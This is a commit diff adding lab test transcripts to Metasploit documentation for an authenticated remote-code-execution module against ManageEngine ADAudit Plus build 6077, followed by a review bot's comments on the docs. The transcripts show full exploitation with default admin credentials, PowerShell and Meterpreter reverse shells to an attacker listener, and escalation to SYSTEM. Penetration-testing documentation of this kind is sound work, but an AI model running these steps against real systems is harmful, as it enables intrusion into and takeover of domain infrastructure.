Add in ADAudit Plus build 6077 testing examples

Grant Willcox
2023-05-08 11:45:44 -05:00
parent b8856bbb87
commit c221edb1ec
@@ -165,3 +165,208 @@ PS C:\Program Files\ManageEngine\ADAudit Plus\bin>whoami
lies\administrator
PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
```
### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Powershell Payload
```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
RHOSTS => 192.168.204.132
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_DOMAIN ADAuditPlus Authentication yes ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.204.132 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8081 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to ManageEngine ADAudit Plus
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.128 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > check
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[*] 192.168.204.132:8081 - The target appears to be vulnerable. The target is ADAudit Plus 6077
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.204.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile fw4hKcxDG
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[*] Powershell session session 2 opened (192.168.204.128:4444 -> 192.168.204.132:62845) at 2023-05-04 19:42:57 -0500
[*] Powershell session session 1 opened (192.168.204.128:4444 -> 192.168.204.132:62844) at 2023-05-04 19:42:57 -0500
[*] Attempting to delete alert profile fw4hKcxDG
[+] Successfully deleted alert profile fw4hKcxDG
PS C:\Program Files\ManageEngine\ADAudit Plus\bin> whoami
daforest\administrator
PS C:\Program Files\ManageEngine\ADAudit Plus\bin> ^X^Z
Background session 2? [y/N] y
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 powershell windows Administrator @ WIN-BRSHGJGIDFM 192.168.204.128:4444 -> 192.168.204.132:62844 (192.168.204.132)
2 powershell windows Administrator @ WIN-BRSHGJGIDFM 192.168.204.128:4444 -> 192.168.204.132:62845 (192.168.204.132)
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) >
```
### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Meterpreter Payload
```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
RHOSTS => 192.168.204.132
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_DOMAIN ADAuditPlus Authentication yes ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.204.132 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8081 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to ManageEngine ADAudit Plus
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.128 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.204.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile iEQnR24qE9n1
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[*] Sending stage (200774 bytes) to 192.168.204.132
[*] Sending stage (200774 bytes) to 192.168.204.132
[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
WARNING: Local file /home/gwillcox/git/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[!] If the client portion of stdapi or priv fails to load, you can do so manually via 'load stdapi' and/or load priv'
[*] Meterpreter session 4 opened (192.168.204.128:4444 -> 192.168.204.132:62858) at 2023-05-04 19:45:48 -0500
[*] Attempting to delete alert profile iEQnR24qE9n1
[*] Meterpreter session 3 opened (192.168.204.128:4444 -> 192.168.204.132:62857) at 2023-05-04 19:45:48 -0500
[+] Successfully deleted alert profile iEQnR24qE9n1
meterpreter > load stdapi
Loading extension stdapi...Success.
meterpreter > load priv
[!] The "priv" extension has already been loaded.
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
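Review bot: The Meterpreter Payload transcript carries local-development noise that will mislead readers of these docs: the lines `[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi` and `WARNING: Local file /home/gwillcox/git/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used`, plus the manual `load stdapi` / `load priv` recovery that follows, come from the tester's checkout rather than from the module, and the path also leaks a personal home directory. Suggest re-capturing that run on a clean install, or cutting those lines and stating that stdapi loaded normally. Two smaller points in the same section: the `show options` output still lists `cmd/windows/powershell_reverse_tcp` because it was captured before `set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp`, so move the `set payload` above it or re-run `show options` afterwards; and both runs show two sessions opening per exploit (1 and 2, then 3 and 4), which deserves a sentence explaining why the module yields a duplicate session so users are not surprised by it. Finally, the fenced blocks have no language tag and there is no blank line between each closing fence and the following `###` heading, which some Markdown renderers require.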